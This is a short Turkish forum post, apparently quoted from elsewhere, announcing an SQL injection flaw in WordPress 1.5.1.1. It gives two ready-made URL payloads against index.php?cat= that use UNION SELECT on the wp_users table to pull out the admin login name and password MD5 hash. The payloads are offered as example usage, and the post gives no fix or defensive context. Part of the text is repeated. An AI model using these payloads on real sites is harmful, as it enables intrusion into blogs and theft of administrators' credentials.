WordPress Blog scriptinin 1.5.1.1 versiyonunda (son versiyon 1.5.1.2) yapılandırma yanlışlığında doğan SQL Injection açıkları mevcuttur.
Bu açık kullanılarak Blog Admininin kullanıcı adı ve şifresinin md5 hashine ulaşmak mümkün.
Örnek Kullanım:
Not : Boşluklar yok.
[Alıntıdır]
Bu açık kullanılarak Blog Admininin kullanıcı adı ve şifresinin md5 hashine ulaşmak mümkün.
Örnek Kullanım:
Kod:
QUOTE:
index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 ))%20FROM%20wp_users/*
Kod:
QUOTE:
index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 )),null,null,null%20FROM%20wp_users/**
Not : Boşluklar yok.
[Alıntıdır]